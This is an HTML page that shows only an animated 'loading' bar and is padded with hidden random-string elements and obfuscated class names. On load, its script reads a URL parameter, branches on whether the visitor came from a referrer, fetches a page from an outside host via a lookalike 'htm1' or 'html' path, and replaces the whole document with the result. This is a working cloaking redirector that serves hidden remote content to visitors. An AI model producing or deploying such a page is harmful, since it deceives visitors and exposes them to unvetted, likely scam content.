<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .yyuJHv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .yyuJHv .tf3mdwnI8cb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .yyuJHv .content {
            line-height: 50px;
            text-align: center
        }

        .yyuJHv .img {
            width: 100%
        }

        .yyuJHv .s23nbDsEb {
            text-align: center
        }

        .yyuJHv .s23nbDsEb span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .yyuJHv .s23nbDsEb span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .yyuJHv .s23nbDsEb span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .yyuJHv .s23nbDsEb span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .yyuJHv .s23nbDsEb span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .yyuJHv .s23nbDsEb span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .yyuJHv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YBNRFfRB5rf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CJj4xig = YBNRFfRB5rf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CJj4xig +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CJj4xig +".html?a=share";
		}
		
        pUxs3qi6e=url+"#"+new Date().getTime();
        pUxs3qi6e && function() {
            $.get(pUxs3qi6e, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Stw5ZywUb2zWU9exQdB1NVHUWRiaZ05sfhxcbSQJQFEMUx5FGTYCQgfeniYcdv866K4OxGm</span>
<div style='display:none'>SqlI1vREVZiyQGz91bYFG8f4BLduzS9ZcJr2V2Zhf1yr</div>
<li style='display:none' >CUx20PJg6xzQejc4E0b12Ow7eNEr24IfK7YLl7TW2aWL1J3gDuPPz</li>
<b style='display:none' >uqeciqo90osMO7d8Aro0ryL1INro01xdWOqZGC9R</b>
<img  src='' style='display:none'>
<p  style='display:none'>FkdsiufVRPc</p><div class="yyuJHv">
    <div class="tf3mdwnI8cb">
        <div class="s23nbDsEb">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >eVb41pcGC3LuzEQR1gYmGG1X1z8XCUSE9Jntpea1bmBu9uw4</li>
<b style='display:none' >in7mMCxvGmWI</b>
<h1 style='display:none' >ahZaVdjFvTiyj7ayFkCWtn94S6F5nr4muMnsLx60Icoeru3C2RPi5dwX3jfD1nrT</h1>
<ul style='display:none' >Gt4BQIitjY8ybK0Yq3jV0MASL5Qsag5rTUeksPn1xwqjONlQgj4lg62d7BWB9kHX2QookQjPTngmZ</ul>
<b style='display:none' >in7mMCxvGmWI</b></body>
</html>